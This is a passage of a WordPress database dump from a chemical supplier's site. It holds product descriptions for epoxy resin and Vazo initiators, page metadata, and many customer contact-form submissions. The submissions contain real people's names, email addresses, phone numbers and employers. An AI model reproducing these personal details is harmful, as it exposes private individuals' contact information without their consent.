pot life of the EPIKOTE Resin 862 / EPIKURE W Curing Agent resin system make it suitable for use in wet filament winding applications.\r\nThe material may be used at room temperature or heated to reduce viscosity and facilitate fiber wetout. The initial mixed system viscosity of 2200 cP may be reduced to approximately 1000 cP by heating the system to about 40 °C (100 °F). The pot life at this temperature is in excess of 8 hours, sufficient for winding large or complex parts. EPIKOTE Resin 862/EPIKURE\r\nCuring Agent W is suitable for use with glass, carbon, and aramid reinforcements. If air entrainment during mixing or fiber impregnation proves to be a problem, air release agents, such as BYK™ A-501* or equivalent, may be added. Cure may be conducted through internal heat sources in the mandrel or externally with ovens or both. Additional resin/reinforcement compaction may be accomplished during cure using traditional vacuum and pressure techniques. Frequently, a staged cure is most desirable in order to minimize resin runout and void formation in the composite. If\r\nshrinkwrap, vacuum bagging, or other external containment is not utilized, it is recommended that the part be rotated during cure to ensure uniform resin distribution through the part. A suggested cure cycle would include 1 hour at 121 °C (250 °F) plus 2.5 hours at 177 °C (350 °F).'); 
INSERT INTO `wp_postmeta` VALUES (25325, 1059, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25326, 568, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25327, 568, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25328, 568, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25329, 568, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (25330, 568, '_ywtm_content_tab_description', 'Vazo 52, known as 2-2\'-Azobis(2,4-dimethylvaleronitrile) is an azo free radical initiator  typically used as a polymerization initiator. Vazo 52 has the lowest initiation temperature within the Vazo product line. This product will thermally decompose to generate free radicals and nitrogen gas. Vazo 52 finds excellent utility as a blowing agent in foams composites. Benefits of Vazo 52 radical initiator include:\r\n<ul>\r\n 	<li>Ideal for low-temperature polymerization</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Low polydispersity; monomer distribution control</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\r\n\r\nVazo 52 radical Initiator are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\r\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\r\n\r\n<ul>\r\n 	<li>\r\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\r\n 	<li>\r\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</div></li>\r\n 	<li>\r\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\r\n 	<li>\r\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\r\n 	<li>\r\n<div>Are available in four grades to use over a wide temperature range.</div></li>\r\n</ul>\r\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]); Shipping is generally done inside cardboard or plastic containers to reveal any internal pressures if the azo compounds are exposed to increased temperature exposure in transit or while in storage.'); 
INSERT INTO `wp_postmeta` VALUES (25331, 568, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25332, 2838, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25333, 2838, '_seq_num', '97'); 
INSERT INTO `wp_postmeta` VALUES (25334, 2838, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25335, 2838, '_field_12', 'Tabatha Pingilley'); 
INSERT INTO `wp_postmeta` VALUES (25336, 2838, '_field_13', 'Source Intelligence'); 
INSERT INTO `wp_postmeta` VALUES (25337, 2838, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25338, 2838, '_field_14', 'customerservice@sourceintelligence.com'); 
INSERT INTO `wp_postmeta` VALUES (25339, 2838, '_field_15', '(855) 648-4744'); 
INSERT INTO `wp_postmeta` VALUES (25340, 2838, '_field_16', 'Hello,\r\nI am looking for the most current SDS for your product Dust Aerosol. Thank you\r\n\r\nRegards\r\n\r\nTabatha Pingilley'); 
INSERT INTO `wp_postmeta` VALUES (25341, 2838, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25342, 2838, '_sub_id', '2838'); 
INSERT INTO `wp_postmeta` VALUES (25343, 2839, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25344, 2839, '_seq_num', '98'); 
INSERT INTO `wp_postmeta` VALUES (25345, 2839, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25346, 2839, '_field_12', 'Eric Bisel'); 
INSERT INTO `wp_postmeta` VALUES (25347, 2839, '_field_13', 'Simonds Int&#039;L'); 
INSERT INTO `wp_postmeta` VALUES (25348, 2839, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25349, 2839, '_field_14', 'ebisel@simondsint.com'); 
INSERT INTO `wp_postmeta` VALUES (25350, 2839, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25351, 2839, '_field_16', 'We purchased MS-260 from you and we now need to Update our MSDS to the new SDS'); 
INSERT INTO `wp_postmeta` VALUES (25352, 2839, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25353, 2839, '_sub_id', '2839'); 
INSERT INTO `wp_postmeta` VALUES (25354, 2840, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25355, 2840, '_seq_num', '99'); 
INSERT INTO `wp_postmeta` VALUES (25356, 2840, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25357, 2840, '_field_12', 'peter chase'); 
INSERT INTO `wp_postmeta` VALUES (25358, 2840, '_field_13', 'Centryco'); 
INSERT INTO `wp_postmeta` VALUES (25359, 2840, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25360, 2840, '_field_14', 'pete@centryco.com'); 
INSERT INTO `wp_postmeta` VALUES (25361, 2840, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25362, 2840, '_field_16', 'Hello,\nI would like to request an SDS for MS-222N, MS-222T,&amp;MS-222F.\nThank you in advance.'); 
INSERT INTO `wp_postmeta` VALUES (25363, 2840, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25364, 2840, '_sub_id', '2840'); 
INSERT INTO `wp_postmeta` VALUES (25365, 2841, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25366, 2841, '_seq_num', '100'); 
INSERT INTO `wp_postmeta` VALUES (25367, 2841, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25368, 2841, '_field_12', 'Christina Urias'); 
INSERT INTO `wp_postmeta` VALUES (25369, 2841, '_field_13', 'MECX'); 
INSERT INTO `wp_postmeta` VALUES (25370, 2841, '_field_18', '139'); 
INSERT INTO `wp_postmeta` VALUES (25371, 2841, '_field_14', 'christina.urias-1@nasa.gov'); 
INSERT INTO `wp_postmeta` VALUES (25372, 2841, '_field_15', '(661) 276-2339'); 
INSERT INTO `wp_postmeta` VALUES (25373, 2841, '_field_16', 'can I please get an SDS for MS-122DF'); 
INSERT INTO `wp_postmeta` VALUES (25374, 2841, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25375, 2841, '_sub_id', '2841'); 
INSERT INTO `wp_postmeta` VALUES (25376, 2842, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25377, 2842, '_seq_num', '101'); 
INSERT INTO `wp_postmeta` VALUES (25378, 2842, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25379, 2842, '_field_12', 'Zayyanul Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (25380, 2842, '_field_13', 'mill'); 
INSERT INTO `wp_postmeta` VALUES (25381, 2842, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25382, 2842, '_field_14', 'zayyanc@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (25383, 2842, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25384, 2842, '_field_16', 'testesaestaese'); 
INSERT INTO `wp_postmeta` VALUES (25385, 2842, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25386, 2842, '_sub_id', '2842'); 
INSERT INTO `wp_postmeta` VALUES (25387, 2843, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25388, 2843, '_seq_num', '88'); 
INSERT INTO `wp_postmeta` VALUES (25389, 2843, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25390, 2843, '_field_1', 'Zayyanul Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (25391, 2843, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (25392, 2843, '_field_2', 'zayyanc@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (25393, 2843, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (25394, 2843, '_field_3', 'testestsestsest'); 
INSERT INTO `wp_postmeta` VALUES (25395, 2843, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25396, 2843, '_sub_id', '2843'); 
INSERT INTO `wp_postmeta` VALUES (25397, 2844, '_wp_attached_file', '2016/08/ReleaSys-89-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25398, 2845, '_wp_attached_file', '2016/08/ReleaSys-Product-Guide-aerosol.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25399, 2846, '_wp_attached_file', '2016/08/ReleaSys-8900-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25400, 2847, '_wp_attached_file', '2016/08/ReleaSys-Product-Guide-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25401, 2848, '_wp_attached_file', '2016/08/ReleaSys-8800-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25402, 2849, '_wp_attached_file', '2016/08/ReleaSys-88-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25403, 2850, '_wp_attached_file', '2016/08/ReleaSys-8500-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25404, 2851, '_wp_attached_file', '2016/08/ReleaSys-85-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25405, 2852, '_wp_attached_file', '2016/08/ReleaSys-8200-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25406, 2853, '_wp_attached_file', '2016/08/ReleaSys-82-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25407, 2854, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25408, 2854, '_seq_num', '102'); 
INSERT INTO `wp_postmeta` VALUES (25409, 2854, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25410, 2854, '_field_12', 'stephen webb'); 
INSERT INTO `wp_postmeta` VALUES (25411, 2854, '_field_13', 'Gaston Electronics'); 
INSERT INTO `wp_postmeta` VALUES (25412, 2854, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25413, 2854, '_field_14', 'swebb@gastonelectronics.com'); 
INSERT INTO `wp_postmeta` VALUES (25414, 2854, '_field_15', '(704) 822-5302'); 
INSERT INTO `wp_postmeta` VALUES (25415, 2854, '_field_16', 'Precision Cleaning Solvent MS-580'); 
INSERT INTO `wp_postmeta` VALUES (25416, 2854, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25417, 2854, '_sub_id', '2854'); 
INSERT INTO `wp_postmeta` VALUES (25418, 2854, '_edit_lock', '1478195098:1'); 
INSERT INTO `wp_postmeta` VALUES (25419, 2855, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25420, 2855, '_seq_num', '103'); 
INSERT INTO `wp_postmeta` VALUES (25421, 2855, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25422, 2855, '_field_12', 'Richard Millard'); 
INSERT INTO `wp_postmeta` VALUES (25423, 2855, '_field_13', 'Linear Technology'); 
INSERT INTO `wp_postmeta` VALUES (25424, 2855, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25425, 2855, '_field_14', 'rmillard@linear.com'); 
INSERT INTO `wp_postmeta` VALUES (25426, 2855, '_field_15', '(719) 593-1579'); 
INSERT INTO `wp_postmeta` VALUES (25427, 2855, '_field_16', 'I am looking for a current SDS for your MS-242N Quik- Freeze product.  I am updating our SDS book.\r\nThank you,\r\nRichard Millard \r\nLab Supervisor\r\nLinear Technology\r\nColorado Springs, CO'); 
INSERT INTO `wp_postmeta` VALUES (25428, 2855, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25429, 2855, '_sub_id', '2855'); 
INSERT INTO `wp_postmeta` VALUES (25430, 2856, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25431, 2856, '_seq_num', '104'); 
INSERT INTO `wp_postmeta` VALUES (25432, 2856, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25433, 2856, '_field_12', 'keith read'); 
INSERT INTO `wp_postmeta` VALUES (25434, 2856, '_field_13', 'Communications &amp; Power Industries, (CPI)'); 
INSERT INTO `wp_postmeta` VALUES (25435, 2856, '_field_18', 'unknown'); 
INSERT INTO `wp_postmeta` VALUES (25436, 2856, '_field_14', 'keith.read@cpii.com'); 
INSERT INTO `wp_postmeta` VALUES (25437, 2856, '_field_15', '(978) 279-0682'); 
INSERT INTO `wp_postmeta` VALUES (25438, 2856, '_field_16', 'I am using the aerosol conformal coat (urethane) MS-470C.  I have read the literature available on your website.  We are experiencing bubbles .  After the last coat, we place board into 60deg oven for 2 to 8 hours.  Is there a minimum wait time between last coat to being placed into the oven?  \nWe started using the oven once we started experiencing the coats were still soft long after 7 days.  Previously to this, we had been letting the boards dry at room temperature.  \nIt should be noted that we applying enough coats (by hand) to achieve thickness of ~.004&quot; on both sides of the board.  this can take 6 to 12 coats depending on the operator.  We wait the 30 minutes between coats (sometimes 20 minutes).\nShould we wait 12 - 24 hours at room temperature prior to placing into the oven?\nShould we stop after a certain number of coats and wait longer than the 30 minutes?\nIf we spray the coats at less than 30% RH, will it set up a scabbing on the top surface too fast trapping gases and eventually cause bubbles?\nIs it possible for someone to call me to discuss?\nThank you in advance for your help. \nKeith Read\n'); 
INSERT INTO `wp_postmeta` VALUES (25439, 2856, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25440, 2856, '_sub_id', '2856'); 
INSERT INTO `wp_postmeta` VALUES (25441, 2857, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25442, 2857, '_seq_num', '89'); 
INSERT INTO `wp_postmeta` VALUES (25443, 2857, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25444, 2857, '_field_1', 'Scott Kiriazis'); 
INSERT INTO `wp_postmeta` VALUES (25445, 2857, '_field_10', 'Inalfa Roof Systems'); 
INSERT INTO `wp_postmeta` VALUES (25446, 2857, '_field_2', 'Scott.Kiriazis@inalfa-roofsystems.us'); 
INSERT INTO `wp_postmeta` VALUES (25447, 2857, '_field_8', '(248) 494-2601'); 
INSERT INTO `wp_postmeta` VALUES (25448, 2857, '_field_3', 'Hello,\n\nMy name is Scott Kiriazis and I am a buyer at Inalfa Roof Systems. We are one of the nations largest manufacturers of automotive sunroofs. I&#039;m interested in having Miller-Stephenson quote Krytox grease and oil for us. Please contact me as soon as possible.\n\nThank you,\n\nScott Kiriazis\nOperational Support Buyer\n\nInalfa Roof Systems, Inc.\n1370 Pacific Drive\nAuburn Hills, MI 48326\nUnited States of America\nT: +00-(1) 248-754-1475\nM: +00-(1) 248-494-2601\nE: Scott.Kiriazis@inalfa-roofsystems.us\nW: www.inalfa-roofsystems.com'); 
INSERT INTO `wp_postmeta` VALUES (25449, 2857, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25450, 2857, '_sub_id', '2857'); 
INSERT INTO `wp_postmeta` VALUES (25461, 2859, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25462, 2859, '_seq_num', '105'); 
INSERT INTO `wp_postmeta` VALUES (25463, 2859, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25464, 2859, '_field_12', 'Sarah Lakewood'); 
INSERT INTO `wp_postmeta` VALUES (25465, 2859, '_field_13', 'Gamber-Johnson, LLC'); 
INSERT INTO `wp_postmeta` VALUES (25466, 2859, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25467, 2859, '_field_14', 'sarah.lakewood@gamberjohnson.com'); 
INSERT INTO `wp_postmeta` VALUES (25468, 2859, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25469, 2859, '_field_16', 'Please email me the most current SDS sheet for the following:  MS-122AD; DPMS-Z0918A; PTFE Release Agent/Dry Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (25470, 2859, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25471, 2859, '_sub_id', '2859'); 
INSERT INTO `wp_postmeta` VALUES (25512, 2859, '_edit_lock', '1478532439:2'); 
INSERT INTO `wp_postmeta` VALUES (25538, 2869, '_edit_lock', '1496148675:3'); 
INSERT INTO `wp_postmeta` VALUES (25539, 2869, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (25540, 2869, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (25541, 2869, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25542, 2869, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (25543, 2869, '_yoast_wpseo_title', 'Polyurethane Mold Release Agents | Urethane Molding | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (25544, 2869, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25545, 2869, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (25546, 2869, '_yoast_wpseo_primary_category', '216'); 
INSERT INTO `wp_postmeta` VALUES (25547, 2872, '_wp_attached_file', '2016/11/shutterstock_407802055-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (25548, 2872, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:36:"2016/11/shutterstock_407802055-1.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"shutterstock_407802055-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"shutterstock_407802055-1-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"shutterstock_407802055-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"shutterstock_407802055-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"shutterstock_407802055-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"shutterstock_407802055-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"shutterstock_407802055-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (25549, 2872, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (25550, 2869, '_thumbnail_id', '2872'); 
INSERT INTO `wp_postmeta` VALUES (25551, 2869, '_yoast_wpseo_focuskw_text_input', 'Polyurethane Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (25552, 2869, '_yoast_wpseo_focuskw', 'Polyurethane Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (25553, 2869, '_yoast_wpseo_metadesc', 'Miller-Stephenson\'s Polyurethane Mold Release Agents offer unmatched performance and efficiency and come in water and solvent based formulations - ReleaSys.'); 
INSERT INTO `wp_postmeta` VALUES (25555, 2869, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (25556, 2869, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25565, 2882, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25566, 2882, '_seq_num', '95'); 
INSERT INTO `wp_postmeta` VALUES (25567, 2882, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25568, 2882, '_field_1', 'Cristina Roxas'); 
INSERT INTO `wp_postmeta` VALUES (25569, 2882, '_field_10', 'True Manufacturing'); 
INSERT INTO `wp_postmeta` VALUES (25570, 2882, '_field_2', 'croxas@truemfg.com'); 
INSERT INTO `wp_postmeta` VALUES (25571, 2882, '_field_8', '(636) 240-2400'); 
INSERT INTO `wp_postmeta` VALUES (25572, 2882, '_field_3', 'Hello,\n\nWe&#039;ve purchased (Dupont Krytox Oven Grease GPL407) from your company before will you be able to email me a quote for 10 tubes (1.76lbs/ .8kg) Thanks'); 
INSERT INTO `wp_postmeta` VALUES (25573, 2882, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25574, 2882, '_sub_id', '2882'); 
INSERT INTO `wp_postmeta` VALUES (25576, 2882, '_edit_lock', '1478532463:2'); 
INSERT INTO `wp_postmeta` VALUES (25584, 2886, '_edit_lock', '1496148717:3'); 
INSERT INTO `wp_postmeta` VALUES (25585, 2886, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (25586, 2886, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (25587, 2886, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25588, 2886, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (25589, 2886, '_yoast_wpseo_focuskw_text_input', 'Rubber Mold Release'); 
INSERT INTO `wp_postmeta` VALUES (25590, 2886, '_yoast_wpseo_focuskw', 'Rubber Mold Release'); 
INSERT INTO `wp_postmeta` VALUES (25591, 2886, '_yoast_wpseo_title', 'Rubber Mold Release Agents | Silicone Mold Release Agents | ReleaSys'); 
INSERT INTO `wp_postmeta` VALUES (25592, 2886, '_yoast_wpseo_metadesc', 'Rubber Mold Release Agents and Silicone Mold Release Agents utilizing advanced semi-permanent mold release technology to maximize durability and no transfer'); 
INSERT INTO `wp_postmeta` VALUES (25593, 2886, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25594, 2886, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (25595, 2886, '_yoast_wpseo_primary_category', '216'); 
INSERT INTO `wp_postmeta` VALUES (25596, 2888, '_wp_attached_file', '2016/11/shutterstock_259045955.jpg'); 
INSERT INTO `wp_postmeta` VALUES (25597, 2888, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/11/shutterstock_259045955.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_259045955-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_259045955-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_259045955-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_259045955-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_259045955-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_259045955-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_259045955-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (25608, 2888, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (25609, 2886, '_thumbnail_id', '2888'); 
INSERT INTO `wp_postmeta` VALUES (25610, 2886, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25612, 2886, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (25616, 2896, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25617, 2896, '_seq_num', '97'); 
INSERT INTO `wp_postmeta` VALUES (25618, 2896, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25619, 2896, '_field_1', 'Javier Valls'); 
INSERT INTO `wp_postmeta` VALUES (25620, 2896, '_field_10', 'Aim Electronic'); 
INSERT INTO `wp_postmeta` VALUES (25621, 2896, '_field_2', 'jvalls@aimelectronic.es'); 
INSERT INTO `wp_postmeta` VALUES (25622, 2896, '_field_8', '(346) 632-0946'); 
INSERT INTO `wp_postmeta` VALUES (25623, 2896, '_field_3', 'Dear Sirs\r\nI am interested in some of your products to distribute it in Spain and Portugal in the electronic industry . We are a distribution company for consumables and machinery and I believe it fits perfectly for some of our customer needs\r\nBest regards'); 
INSERT INTO `wp_postmeta` VALUES (25624, 2896, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25625, 2896, '_sub_id', '2896'); 
INSERT INTO `wp_postmeta` VALUES (25630, 2896, '_edit_lock', '1478532474:2'); 
INSERT INTO `wp_postmeta` VALUES (25631, 2856, '_edit_lock', '1478288146:2'); 
INSERT INTO `wp_postmeta` VALUES (25632, 2855, '_edit_lock', '1478289478:3'); 
INSERT INTO `wp_postmeta` VALUES (25640, 2829, '_edit_lock', '1478289493:3'); 
INSERT INTO `wp_postmeta` VALUES (25641, 2813, '_edit_lock', '1478289523:3'); 
INSERT INTO `wp_postmeta` VALUES (25642, 2841, '_edit_lock', '1478289598:3'); 
INSERT INTO `wp_postmeta` VALUES (25643, 2904, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25644, 2904, '_seq_num', '98'); 
INSERT INTO `wp_postmeta` VALUES (25645, 2904, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25646, 2904, '_field_1', 'HECTOR ANDRADEDIAZ'); 
INSERT INTO `wp_postmeta` VALUES (25647, 2904, '_field_10', 'NAVY RESEARCH LAB'); 
INSERT INTO `wp_postmeta` VALUES (25648, 2904, '_field_2', 'HECTOR.ANDRADEDIAZ@NRL.NAVY.MIL'); 
INSERT INTO `wp_postmeta` VALUES (25649, 2904, '_field_8', '(202) 767-2022'); 
INSERT INTO `wp_postmeta` VALUES (25650, 2904, '_field_3', 'Bis(N,N′-di-tert-butylacetamidinato) nickel(II)\nDo you sell this item?'); 
INSERT INTO `wp_postmeta` VALUES (25651, 2904, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25652, 2904, '_sub_id', '2904'); 
INSERT INTO `wp_postmeta` VALUES (25653, 2904, '_edit_lock', '1478532554:2'); 
INSERT INTO `wp_postmeta` VALUES (25670, 2909, '_edit_lock', '1503000231:2'); 
INSERT INTO `wp_postmeta` VALUES (25671, 2909, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (25672, 2909, '_show_author_inthis_post', 'not_inthis_post'); 
